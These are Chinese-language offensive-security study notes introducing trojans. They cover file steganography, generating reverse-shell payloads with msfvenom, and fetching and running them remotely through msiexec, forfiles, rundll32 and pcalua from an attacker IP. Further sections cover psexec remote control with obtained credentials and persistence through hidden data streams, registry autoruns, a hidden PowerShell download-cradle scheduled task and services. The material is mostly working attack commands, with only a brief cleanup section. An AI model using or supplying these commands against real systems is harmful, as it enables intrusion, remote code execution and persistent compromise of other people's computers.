二进制安全之木马程序简介

当作（计算机会把不同的程序作为什么类型的文件和不同的方式来进行执行）

文件头的作用：

告诉系统，把下面的二进制代码，当作什么来执行！！！！

操作系统为了方便用户使用，使用后缀名这个机制：

.exe .dll .jpg .jpeg .png .avi .mp3 .mp4....

逆向工程工具：C32

协议：

李老师协议:

协议头001100->内容1->结束语1111

001100 xxxxxxxxx xxxx xxxx xxxxx 1111

01011101010110101011101010 001100 1011010101011010101 1111 1010101010110101010101

PE文件(exe程序 可执行文件):

PE头，代码段，函数，资源，结尾

文件合并/隐写：

隐写方法1：cmd下copy合并命令

copy Penguins.jpg /a + haha.rar /b xxx.jpg   //最低级别的隐写术

既可以用jpg打开（有时候不靠谱），修改结尾为rar也可以用rar打开

隐写方法2：c32二进制代码复制合并

用c32把rar的代码直接复制到jpg文件的最后，保存(使用二进制的方法进行合并)

这样就是完整的隐写

木马=干坏事的exe

生成txt格式的木马 （使用msi来执行）

msfvenom -p windows/x64/shell/reverse_tcp lhost=192.168.1.120 lport=4444 -f msi > haha.txt

上线方式：静默安装包msi

默认位置：（系统自带的）

C:\Windows\System32\msiexec.exe
C:\Windows\SysWOW64\msiexec.exe

远程加载木马到电脑运行（可以在公网的网站目录放木马 让计算机去远程执行）

msiexec /q /i http://192.168.1.252/haha.txt

此时目标计算机cmd下执行成功这条命令以后，msf中也就可以成功上线了

dll执行法：(不支持远程执行 可以通过本地去执行)

msfvenom -p windows/x64/shell/reverse_tcp lhost=192.168.1.120 lport=4444 -f dll > haha.dll
msiexec /y xxx.dll
rundll32.exe shell32.dll,Control_RunDLL ./haha.dll

forfiles执行（利用forfiles去执行cmd 再去执行远程加载即可）

默认位置：

C:\Windows\System32\forfiles.exe
C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec /q /i http://192.168.1.252/haha.txt"

Pstools微软官方自带的系统插件：

准备工作：

1.目标主机防火墙最好关闭！

2.创建/获得对方计算机用户名密码！

直接控制对方的cmd

psexec \\目标ip -u [目标用户名] -p [密码] cmd.exe

控制对方运行自己的b.exe（后台运行）

psexec \\目标ip -u [目标用户名] -p [密码] -c c:\b.exe

控制对方运行他电脑的a.exe（后台运行）

psexec \\目标ip -u [目标用户名] -p [密码] -d c:\a.exe

控制对方运行自己的b.exe并且以system权限运行

psexec \\目标ip -u [目标用户名] -p [密码] -s -c c:\b.exe

以显示的方式运行（在前台就可以看到了）

psexec \\目标ip -u [目标用户名] -p [密码] -i -s -c c:\b.exe

pcalua

处理情况：

1.当前电脑的硬盘不能用

2.自己权限不高

//可以令目标来远程连接黑客的电脑

pcalua -m -a \\[黑客自己的ip]\[共享名]

zipfldr执行共享程序（可以直接执行黑客电脑上的程序）

rundll32.exe zipfldr.dll,RouteTheCall \\[自己的ip]\[共享名]\文件名

权限维持：

1.ADS隐藏文件 ：//会在电脑上生成index.php和haha.jpg  且haha.jpg找不到

echo ^ > index.php:haha.jpg

其实生成了一个不可见的haha.jpg，常规文件管理器，type命令，dir命令，del命令都找不到haha.jpg

访问方法：

进入文件所在的目录，然后

notepad index.php:haha.jpg   或者  dir /r

如何删除haha.jpg------> 直接删除index.php

-----------------------------------------------------------------------------------------------------------------------------------------

2.驱动级的文件隐藏： 该软件隐藏后 dir /r也没办法看到

http://www.xoslab.com/efl.html

如果在相应目录未查到对应文件，但是系统目录存在以下文件：

c:\windows\xlkfs.xxx      (dat,dll,ini,log)

C:\Windows\System32\drivers\xlkfs.sys

说明碰到了驱动级的文件隐藏

如何清除：

1.查询服务状态 sc qc xlkfs

2.停止服务 net stop xlkfs

3.删除服务 sc delete xlkfs

4.把找到的xlkfs.xxxx都删除了

注册表自启动：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

winlogo/userinit 初始化的部位

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

logon script

HKEY_CURRENT_USER\Environment
创建一个字符串值
UserInitMprLogonScript
设置数值数据为
c:\a.exe    （开机想要自启动的程序）

计划任务：

schtasks /create /sc minute /mo 1 /tn "haha" /tr "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"http://192.168.1.252/haha.txt\"\"\"))\""

服务启动：

sc create "nihao" binpath= "cmd /c start mkdir c:\123" 增加一个服务
sc description nihao "hahahahah" 设置服务的描述
sc config nihao start= auto 设置自动启动
net start nihao 开启服务